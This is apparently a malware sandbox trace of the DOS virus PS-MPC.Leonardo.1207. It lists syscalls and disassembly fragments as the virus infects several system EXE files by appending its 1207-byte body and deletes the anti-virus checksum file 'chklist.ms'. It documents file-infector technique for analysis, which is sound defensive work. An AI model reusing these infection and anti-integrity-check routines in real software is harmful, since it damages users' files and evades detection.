Sample viewer

vx.netlux.org/Virus.DOS.PS-MPC.Leonardo.1207

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:48:45.848875328Z 25 PC: 15198 | Get default drive
2018-12-17T22:48:45.85831974Z 71 PC: 151a7 | Get current directory
2018-12-17T22:48:45.861196068Z 26 PC: 153fd | Set disk transfer address
2018-12-17T22:48:45.862511686Z 78 PC: 15408 | Find first file
2018-12-17T22:48:45.869092253Z 67 PC: 1542b | Get or set file attributes
2018-12-17T22:48:45.875936853Z 67 PC: 15433 | Get or set file attributes
2018-12-17T22:48:45.89970014Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-17T22:48:45.912003768Z 87 PC: 1543e | Get or set file date and time
2018-12-17T22:48:45.913363772Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:48:45.920031502Z 66 PC: 154a6 | Move file pointer
2018-12-17T22:48:45.923013597Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-17T22:48:45.925134056Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-17T22:48:45.927252395Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-17T22:48:45.930413242Z 64 PC: 15550 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:48:45.938507778Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-17T22:48:45.940642312Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-17T22:48:45.949407201Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: std
0x1557f: or ax, word ptr [bx]
0x15581: cmp cl, byte ptr [si - 0x68c6]
0x15585: les sp, ptr [si + 0x59]
0x15588: hlt
0x15589: add byte ptr [bp - 0x691f], dl
0x1558d: ret
0x1558e: mov sp, 0x951a
0x15591: push cx
2018-12-17T22:48:45.951509428Z 64 PC: 1557b | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:48:45.954374811Z 66 PC: 15587 | Move file pointer
2018-12-17T22:48:45.956016506Z 66 PC: 155a8 | Move file pointer
2018-12-17T22:48:45.958693903Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-17T22:48:45.962176881Z 67 PC: 15345 | Get or set file attributes
2018-12-17T22:48:45.967969557Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-17T22:48:45.974227474Z 87 PC: 155cc | Get or set file date and time
2018-12-17T22:48:45.975648003Z 62 PC: 155d0 | Close file
2018-12-17T22:48:45.983558138Z 67 PC: 155da | Get or set file attributes
2018-12-17T22:48:45.995518534Z 79 PC: 1541f | Find next file
2018-12-17T22:48:45.999671781Z 59 PC: 152c0 | Change current directory
2018-12-17T22:48:46.004095214Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-17T22:48:46.007507637Z 26 PC: 153fd | Set disk transfer address
2018-12-17T22:48:46.008884816Z 78 PC: 15408 | Find first file
2018-12-17T22:48:46.014549152Z 59 PC: 152c0 | Change current directory
2018-12-17T22:48:46.019379805Z 59 PC: 151e0 | Change current directory
2018-12-17T22:48:46.025238952Z 26 PC: 153fd | Set disk transfer address
2018-12-17T22:48:46.026586362Z 78 PC: 15408 | Find first file
2018-12-17T22:48:46.036841802Z 67 PC: 1542b | Get or set file attributes
2018-12-17T22:48:46.042662101Z 67 PC: 15433 | Get or set file attributes
2018-12-17T22:48:46.38540042Z 61 PC: 15438 | Open file (Filename = 'ATTRIB.EXE')
2018-12-17T22:48:46.393338204Z 87 PC: 1543e | Get or set file date and time
2018-12-17T22:48:46.396505863Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:48:46.402979813Z 66 PC: 154a6 | Move file pointer
2018-12-17T22:48:46.405701418Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-17T22:48:46.408223401Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-17T22:48:46.410439921Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-17T22:48:46.413378758Z 64 PC: 15550 | Write file or device (Write 0 bytes on handle 5)
2018-12-17T22:48:46.420466117Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-17T22:48:46.422816752Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-17T22:48:46.433742392Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: call 0x1678c
0x15581: cmp bl, byte ptr [bx + di - 0x7dc6]
0x15585: les si, ptr [bx + di + 0x59]
0x15588: loope 0x1558a
0x1558a: and cx, 0xff83
0x1558d: ret
0x1558e: test ax, 0x801a
0x15591: push cx
0x15592: shr ch, 1
0x15594: push cx
0x15595: aaa
0x15596: fstp dword ptr [bx + 0xd83]
0x1559a: outsb dx, byte ptr [si]
0x1559b: adc dh, 0xd8
2018-12-17T22:48:46.43626571Z 64 PC: 1557b | Write file or device (Write 16 bytes on handle 5)
2018-12-17T22:48:46.439652123Z 66 PC: 15587 | Move file pointer
2018-12-17T22:48:46.441517032Z 66 PC: 155a8 | Move file pointer
2018-12-17T22:48:46.443848419Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-17T22:48:46.446596996Z 67 PC: 15345 | Get or set file attributes
2018-12-17T22:48:46.45600052Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-17T22:48:46.463333262Z 87 PC: 155cc | Get or set file date and time
2018-12-17T22:48:46.464965617Z 62 PC: 155d0 | Close file
2018-12-17T22:48:46.472019444Z 67 PC: 155da | Get or set file attributes
2018-12-17T22:48:46.482558789Z 79 PC: 1541f | Find next file
2018-12-17T22:48:46.486192612Z 67 PC: 1542b | Get or set file attributes
2018-12-17T22:48:46.492158348Z 67 PC: 15433 | Get or set file attributes
2018-12-17T22:48:46.502176534Z 61 PC: 15438 | Open file (Filename = 'CHKDSK.EXE')
2018-12-17T22:48:46.508772523Z 87 PC: 1543e | Get or set file date and time
2018-12-17T22:48:46.510118549Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:48:46.516624765Z 66 PC: 154a6 | Move file pointer
2018-12-17T22:48:46.518105882Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-17T22:48:46.520129412Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-17T22:48:46.522652343Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-17T22:48:46.524605787Z 64 PC: 15550 | Write file or device (Write 11 bytes on handle 5)
2018-12-17T22:48:46.53077677Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-17T22:48:46.534075319Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-17T22:48:46.542408531Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: jcxz 0x1558b
0x15580: sbb word ptr [bp + si], di
0x15582: xchg ax, dx
0x15583: cmp cl, byte ptr [bx + di + 0x7ac4]
0x15587: pop cx
0x15588: ljmp 0x88e1:0x8800
0x1558d: ret
0x1558e: mov byte ptr [0x8b1a], al
0x15591: push cx
0x15592: fucomi st(5)
0x15594: pop dx
0x15595: aaa
0x15596: rcr byte ptr [bx + 0xd88], cl
0x1559a: sbb ch, 0xd8
2018-12-17T22:48:46.547136191Z 64 PC: 1557b | Write file or device (Write 27 bytes on handle 5)
2018-12-17T22:48:46.551519923Z 66 PC: 15587 | Move file pointer
2018-12-17T22:48:46.553849277Z 66 PC: 155a8 | Move file pointer
2018-12-17T22:48:46.555142185Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-17T22:48:46.558760698Z 67 PC: 15345 | Get or set file attributes
2018-12-17T22:48:46.565192689Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-17T22:48:46.571625281Z 87 PC: 155cc | Get or set file date and time
2018-12-17T22:48:46.573964297Z 62 PC: 155d0 | Close file
2018-12-17T22:48:46.5809394Z 67 PC: 155da | Get or set file attributes
2018-12-17T22:48:46.590938812Z 79 PC: 1541f | Find next file
2018-12-17T22:48:46.594813098Z 67 PC: 1542b | Get or set file attributes
2018-12-17T22:48:46.600475311Z 67 PC: 15433 | Get or set file attributes
2018-12-17T22:48:46.609559829Z 61 PC: 15438 | Open file (Filename = 'DEBUG.EXE')
2018-12-17T22:48:46.616428483Z 87 PC: 1543e | Get or set file date and time
2018-12-17T22:48:46.617979098Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:48:46.623500435Z 66 PC: 154a6 | Move file pointer
2018-12-17T22:48:46.625569097Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-17T22:48:46.627622094Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-17T22:48:46.629557544Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-17T22:48:46.631961362Z 64 PC: 15550 | Write file or device (Write 0 bytes on handle 5)
2018-12-17T22:48:46.638359781Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-17T22:48:46.64063681Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-17T22:48:46.650437373Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: fmul dword ptr [bp + di]
0x15580: and bh, byte ptr [bp + si]
0x15582: test ax, 0xb23a
0x15585: les ax, ptr [bx + di + 0x59]
0x15588: rol word ptr [bx + si], 1
0x1558a: mov bl, 0xe1
0x1558c: mov bl, 0xc3
0x1558e: cdq
0x1558f: sbb dh, byte ptr [bx + si - 0x1faf]
0x15593: in ax, dx
0x15594: popaw
0x15595: aaa
0x15596: jmp 0x10938
0x15599: or ax, 0x805e
2018-12-17T22:48:46.652686717Z 64 PC: 1557b | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:48:46.655623402Z 66 PC: 15587 | Move file pointer
2018-12-17T22:48:46.657515313Z 66 PC: 155a8 | Move file pointer
2018-12-17T22:48:46.658745704Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-17T22:48:46.661617009Z 67 PC: 15345 | Get or set file attributes
2018-12-17T22:48:46.667905136Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-17T22:48:46.673618561Z 87 PC: 155cc | Get or set file date and time
2018-12-17T22:48:46.675066191Z 62 PC: 155d0 | Close file
2018-12-17T22:48:46.682622121Z 67 PC: 155da | Get or set file attributes
2018-12-17T22:48:46.691636041Z 79 PC: 1541f | Find next file
2018-12-17T22:48:46.694484249Z 67 PC: 1542b | Get or set file attributes
2018-12-17T22:48:46.700469437Z 67 PC: 15433 | Get or set file attributes
2018-12-17T22:48:46.709493632Z 61 PC: 15438 | Open file (Filename = 'EXPAND.EXE')
2018-12-17T22:48:46.716579743Z 87 PC: 1543e | Get or set file date and time
2018-12-17T22:48:46.718265365Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:48:46.723570724Z 66 PC: 154a6 | Move file pointer
2018-12-17T22:48:46.724925891Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-17T22:48:46.72759051Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-17T22:48:46.729737853Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-17T22:48:46.731722697Z 64 PC: 15550 | Write file or device (Write 7 bytes on handle 5)
2018-12-17T22:48:46.738065976Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-17T22:48:46.740982313Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-17T22:48:46.748632615Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov di, 0x4508
0x15581: cmp si, cx
0x15583: cmp bp, dx
2018-12-17T22:48:46.751947423Z 64 PC: 1557b | Write file or device (Write 7 bytes on handle 5)
2018-12-17T22:48:46.754758999Z 66 PC: 15587 | Move file pointer
2018-12-17T22:48:46.756026908Z 66 PC: 155a8 | Move file pointer
2018-12-17T22:48:46.758328218Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-17T22:48:46.761266027Z 67 PC: 15345 | Get or set file attributes
2018-12-17T22:48:46.784822666Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-17T22:48:46.79189438Z 87 PC: 155cc | Get or set file date and time
2018-12-17T22:48:46.793562563Z 62 PC: 155d0 | Close file
2018-12-17T22:48:46.801379573Z 67 PC: 155da | Get or set file attributes
2018-12-17T22:48:46.812215516Z 79 PC: 1541f | Find next file
2018-12-17T22:48:46.815343626Z 67 PC: 1542b | Get or set file attributes
2018-12-17T22:48:46.821642215Z 67 PC: 15433 | Get or set file attributes
2018-12-17T22:48:46.832919928Z 61 PC: 15438 | Open file (Filename = 'FDISK.EXE')
2018-12-17T22:48:46.839644094Z 87 PC: 1543e | Get or set file date and time
2018-12-17T22:48:46.841258893Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:48:46.849631426Z 66 PC: 154a6 | Move file pointer
2018-12-17T22:48:46.851320404Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-17T22:48:46.854555685Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-17T22:48:46.858096195Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-17T22:48:46.860766443Z 64 PC: 15550 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:48:46.867442034Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-17T22:48:46.871286341Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-17T22:48:46.878250092Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: stosb byte ptr es:[di], al
0x1557f: or byte ptr [bx + si + 0x39], dl
0x15582: fstp xword ptr [bx + di]
0x15584: rol bh, 0x33
0x15587: pop dx
0x15588: mov word ptr [0xc103], ax
0x1558b: loop 0x1554e
0x1558d: shr bl, 0x19
0x15590: ret 0x9252
0x15593: out dx, al
0x15594: adc si, word ptr [si]
0x15596: wait
0x15597: pushf
0x15598: ror word ptr [0x832c], -0x6c
2018-12-17T22:48:46.880383141Z 64 PC: 1557b | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:48:46.883628029Z 66 PC: 15587 | Move file pointer
2018-12-17T22:48:46.885640975Z 66 PC: 155a8 | Move file pointer
2018-12-17T22:48:46.887156889Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-17T22:48:46.890164645Z 67 PC: 15345 | Get or set file attributes
2018-12-17T22:48:46.896274041Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-17T22:48:46.901937626Z 87 PC: 155cc | Get or set file date and time
2018-12-17T22:48:46.903345629Z 62 PC: 155d0 | Close file
2018-12-17T22:48:46.909688766Z 67 PC: 155da | Get or set file attributes
2018-12-17T22:48:46.917141052Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-17T22:48:46.918063174Z 59 PC: 152c0 | Change current directory
2018-12-17T22:48:46.921045927Z 59 PC: 152c0 | Change current directory
2018-12-17T22:48:46.923388033Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-17T22:48:46.92434539Z 59 PC: 152c0 | Change current directory
2018-12-17T22:48:46.927395075Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-17T22:48:46.928332385Z 59 PC: 15220 | Change current directory
